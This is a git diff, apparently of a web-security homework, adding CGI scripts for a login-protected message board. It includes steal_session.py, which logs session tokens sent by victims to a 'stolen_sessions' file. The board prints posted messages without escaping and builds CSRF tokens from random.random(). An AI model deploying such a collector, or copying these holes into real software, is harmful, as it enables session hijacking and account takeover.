diff options
Diffstat (limited to 'hw4/cgi-bin')
-rwxr-xr-x | hw4/cgi-bin/._board.py | bin | 0 -> 355 bytes | |||
-rwxr-xr-x | hw4/cgi-bin/._login.py | bin | 0 -> 299 bytes | |||
-rwxr-xr-x | hw4/cgi-bin/._logout.py | bin | 0 -> 299 bytes | |||
-rwxr-xr-x | hw4/cgi-bin/._output.py | bin | 0 -> 299 bytes | |||
-rwxr-xr-x | hw4/cgi-bin/._post.py | bin | 0 -> 299 bytes | |||
-rwxr-xr-x | hw4/cgi-bin/._steal_session.py | bin | 0 -> 299 bytes | |||
-rwxr-xr-x | hw4/cgi-bin/board.py | 21 | ||||
-rwxr-xr-x | hw4/cgi-bin/login.py | 39 | ||||
-rwxr-xr-x | hw4/cgi-bin/logout.py | 23 | ||||
-rwxr-xr-x | hw4/cgi-bin/output.py | 97 | ||||
-rwxr-xr-x | hw4/cgi-bin/post.py | 39 | ||||
-rwxr-xr-x | hw4/cgi-bin/steal_session.py | 24 |
12 files changed, 243 insertions, 0 deletions
diff --git a/hw4/cgi-bin/._board.py b/hw4/cgi-bin/._board.py Binary files differnew file mode 100755 index 0000000..ef20daa --- /dev/null +++ b/hw4/cgi-bin/._board.py diff --git a/hw4/cgi-bin/._login.py b/hw4/cgi-bin/._login.py Binary files differnew file mode 100755 index 0000000..26100f6 --- /dev/null +++ b/hw4/cgi-bin/._login.py diff --git a/hw4/cgi-bin/._logout.py b/hw4/cgi-bin/._logout.py Binary files differnew file mode 100755 index 0000000..9d1f260 --- /dev/null +++ b/hw4/cgi-bin/._logout.py diff --git a/hw4/cgi-bin/._output.py b/hw4/cgi-bin/._output.py Binary files differnew file mode 100755 index 0000000..25267ab --- /dev/null +++ b/hw4/cgi-bin/._output.py diff --git a/hw4/cgi-bin/._post.py b/hw4/cgi-bin/._post.py Binary files differnew file mode 100755 index 0000000..fc9cd5d --- /dev/null +++ b/hw4/cgi-bin/._post.py diff --git a/hw4/cgi-bin/._steal_session.py b/hw4/cgi-bin/._steal_session.py Binary files differnew file mode 100755 index 0000000..69e619e --- /dev/null +++ b/hw4/cgi-bin/._steal_session.py diff --git a/hw4/cgi-bin/board.py b/hw4/cgi-bin/board.py new file mode 100755 index 0000000..5ca8afc --- /dev/null +++ b/hw4/cgi-bin/board.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +from output import * + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET datas + +if not Login(): + DisplayLogin() + +# if we get here, this is an authorized user, let's print the messages +PrintMessages() + +exit(0) diff --git a/hw4/cgi-bin/login.py b/hw4/cgi-bin/login.py new file mode 100755 index 0000000..a308dde --- /dev/null +++ b/hw4/cgi-bin/login.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb +import random + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies +form = cgi.FieldStorage() # for reading GET data + +login = form.getvalue('username') +password = form.getvalue('password') +with open('users', 'r') as users: + s = users.read() + if s.find(login + ' ' + password) == -1: + ShowError() + + # else set session id cookie and store it in the file! + s_id = uuid.uuid4().hex + cookie['session_id'] = s_id # login + + # xss protection -- set session_id cookie to httpOnly + cookie['session_id']['httponly'] = '1' + + with open("sessions", "a") as myfile: + # csrf protection -- session token construction + random.seed() + csrfToken = str(random.random()) + myfile.write(s_id + ' ' + login + ' ' + csrfToken + '\n') + + print cookie + +RedirectToBoard() diff --git a/hw4/cgi-bin/logout.py b/hw4/cgi-bin/logout.py new file mode 100755 index 0000000..9d64800 --- /dev/null +++ b/hw4/cgi-bin/logout.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET data + +message = form.getvalue('message') + +user = Login() +if not user: + ShowError() + exit(0) + +RemoveAllUserSessions(user) +RedirectToBoard() diff --git a/hw4/cgi-bin/output.py b/hw4/cgi-bin/output.py new file mode 100755 index 0000000..544ac60 --- /dev/null +++ b/hw4/cgi-bin/output.py @@ -0,0 +1,97 @@ +import os +import re + +def DisplayLogin(): + print 'Content-Type: text/html\n' + print '<html><body>' + print """ + <div id="container"> + <form action="login.py" method="get"> + <label for="username">Username:</label> + <input type="text" id="username" name="username"> + <label for="password">Password:</label> + <input type="password" id="password" name="password"> + <div id="lower"> + <input type="submit" value="Login"> + </div><!--/ lower--> + </form> + </div> + """ + print '</body></html>' + exit(0) + +def PrintMessages(): + print 'Content-Type: text/html\n' + print '<html><body>' + + with open("messages", "r") as m_file: + s = m_file.read() + l = s.split('\n') + for i in l: + if len(i) == 0: + continue + i.replace('\\n','\n') + print i + print '<br><br>' + print """ + <br><br> + <form action="post.py" method="post" style="display:inline"> + <input type="hidden" name="csrfToken" value=""" + + # csrf protection -- session token sendoff + s_id = os.environ.get('HTTP_COOKIE').split('=')[1] # for reading cookies + + with open('sessions', 'r') as s_file: + for line in s_file: + if s_id in line: + print line.split()[2] + + print """ + <label for="message">Message:</label><br> + <textarea rows="4" cols="50" name="message"></textarea> + <br> + <input type="submit" value="Post"></form> + """ + print """ + <form action="logout.py" style="display:inline"> + <input type="submit" value="Logout" /> + </form> + """ + + print '</body></html>' + +def ShowError(): + print 'Content-Type: text/html\n' + print '<html><body>' + print '<h2> Error ocured :P </h2>' + print '</body></html>' + exit(0) + +def Login(): + cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies + g = re.search('session_id=(\w+)', cookie_string) # if g==None -- no cookie + if not g: + return False + with open('sessions', 'r') as s_file: + s = s_file.read() + sid = g.group(1) + g = re.search(sid + ' ' + '(\w+)', s) + if not g: + return False + return g.group(1) + +def RedirectToBoard(): + #go back to board.py + print 'Content-Type: text/html\n' + print '<meta http-equiv="refresh" content="0; url=board.py" />' + exit(0) + +def RemoveAllUserSessions(user): + tmp = '' + f = open('sessions', 'r') + for line in f: + if user not in line: + tmp += line + f.close() + with open('sessions','w') as f: + f.write(tmp) diff --git a/hw4/cgi-bin/post.py b/hw4/cgi-bin/post.py new file mode 100755 index 0000000..2a0bf8c --- /dev/null +++ b/hw4/cgi-bin/post.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() # allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading POST data + +message = form.getvalue('message') + +user = Login() +if not user: + ShowError() + +if message == None: # to prevent posting empty messages + RedirectToBoard() + +# csrf protection -- check for csrfToken +csrfToken = form.getvalue('csrfToken') + +if csrfToken is None: + ShowError() + +with open('sessions', 'r') as s_file: + for line in s_file: + if user in line and not csrfToken in line: + ShowError() + +message = message.replace('\n','\n') +with open('messages','a') as m: + m.write(user + ': ' + message + '\n') + +RedirectToBoard() diff --git a/hw4/cgi-bin/steal_session.py b/hw4/cgi-bin/steal_session.py new file mode 100755 index 0000000..df84de6 --- /dev/null +++ b/hw4/cgi-bin/steal_session.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET data + +session = form.getvalue('session') + +if session: + with open('stolen_sessions','a') as m: + m.write(session + '\n') + +#Send victim to homepage so they don't notice anything! +print 'Content-Type: text/html\n' +print '<html><body><p style="font-size:25px"><img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img> We got your session key <img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img></p></body></html>' +exit(0) |